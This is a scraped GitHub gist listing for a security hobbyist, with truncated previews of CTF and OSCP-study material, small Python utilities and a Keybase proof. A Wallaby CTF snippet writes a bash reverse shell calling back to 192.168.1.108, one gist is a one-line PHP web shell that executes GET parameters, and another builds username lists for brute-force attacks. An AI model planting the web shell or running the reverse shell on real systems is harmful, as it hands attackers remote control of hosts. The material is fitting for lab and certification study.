Skip to content

Instantly share code, notes, and snippets.

Avatar
🖖
Stay Home!

αvιcoder avicoder

🖖
Stay Home!
View GitHub Profile
View Wallaby-CTF.md

I'd faced issue while executing any command using .run command as it doesn't supporting white spaces and raising exception(for example ls index.html).

I figured up it by creating a .sh file with limited privledge session(www-data) in /html directory.

echo "#! bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh

Now in hexchat exexcute:

View shell.php
<?php
system($_GET['cmd']);
?>
View linuxprivesc.py
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
@avicoder
avicoder / gist:61df8adeac2becdf2b53179521d250e4
Created Mar 27, 2017
Compile python source code on mac - Commands
View gist:61df8adeac2becdf2b53179521d250e4
curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz
tar xzvf Python-2.7.11.tgz
cd Python-2.7.11
./configure --prefix=/usr/local --enable-shared
make
make install
@avicoder
avicoder / namemash.py
Created Aug 7, 2017 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
View namemash.py
#!/usr/bin/env python
import sys
if __name__ == "__main__":
if len(sys.argv) != 2:
print "usage: %s names.txt" % (sys.argv[0])
sys.exit(0)
for line in open(sys.argv[1]):
name = ''.join([c for c in line if c == " " or c.isalpha()])
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@avicoder
avicoder / Arp-Scanner.py
Last active Sep 17, 2017
Simple arp scanner written in python (Scapy module)
View Arp-Scanner.py
#! /usr/bin/python
#Author == @avicoder
import sys,getopt
r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
@avicoder
avicoder / .pystartup
Created Sep 20, 2017 — forked from matterche/.pystartup
Enable Python REPL command history and tab completion
View .pystartup
# Store this file in ~/.pystartup,
# set "export PYTHONSTARTUP=/home/user/.pystartup"
#
# Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the
# full path to your home directory.
import atexit
import os
import readline
import rlcompleter
@avicoder
avicoder / Attacks.md
Last active Dec 10, 2017
Get an Idea about Each one
View Attacks.md
  • Arbitrary file access
  • Binary planting
  • Blind SQL Injection
  • Blind XPath Injection
  • Brute force attack
  • Buffer overflow attack
  • Cache Poisoning
  • Cash Overflow
  • Clickjacking
  • Command injection attacks
View Keybase.md

Keybase proof

I hereby claim:

  • I am avicoder on github.
  • I am avicoder (https://keybase.io/avicoder) on keybase.
  • I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo

To claim this, I am signing this object: